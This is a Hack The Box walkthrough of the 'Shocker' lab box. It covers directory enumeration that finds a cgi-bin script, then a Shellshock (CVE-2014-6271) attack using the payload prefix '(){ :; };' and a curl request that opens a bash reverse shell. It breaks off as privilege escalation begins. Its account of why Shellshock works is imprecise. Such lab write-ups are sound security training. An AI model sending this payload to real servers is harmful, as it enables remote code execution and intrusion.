Hack The Box - Shocker Walkthrough without Metasploit
Shocker: a Linux box rated as easy. Using different enumeration techniques and a common bash vulnerability we will be able to enter, there we will escalate privileges abusing some privileged binary.
Shocker
Enumeration
First we will run nmap (or in our case nmapAutomator.sh a script to make some basic enumeration on the target). We can see two ports open 80 (Http) and 2222 (SSH).
We ran gobuster with the options dir -u (url) -w (wordlist) -t (threads), since we are on a pentesting platform and not in the real world we can use 40 threads.
Gobuster first try
We tried another wordlist, this time we use the big.txt from /usr/share/dirb/wordlists of our kali machine, here we found index.html and /cgi-bin/
Gobuster cgi-bin found
Since we found a cgi-bin folder we will ran Gobuster again, this time with new flags:
-x to indicate extensions to look for
-e to show full path
Gobuster bash found
This output is really interesting, there is a script file on cgi-bin, which means we can attempt a ShellShock attack.
Exploitation
We are going to perform a ShellShock attack CVE 2014-6271, this is a Bash vulnerability that allows RCE (Remote Code Execution) without confirmation. Windows is completely safe from this vulnerability, but since a great percentage of internet is on Apache servers, and the majority of those run on Linux (just like our victim does)...
We send a series of random characters to confuse Bash: (){ :; };
Since Bash is confused and doesn't know what to do with those characters it will, by default, execute the code after them, so we will execute a bash reverse shell.
With that in mind we send a curl to our victim:
ShellShock CVE 2014-6271
ShellShock
Privilege Escalation
Once we are inside we proceed to enumerate again, this time from within the box, our very first command gives us some great results, trying to see if we can run some commands with sudo -l
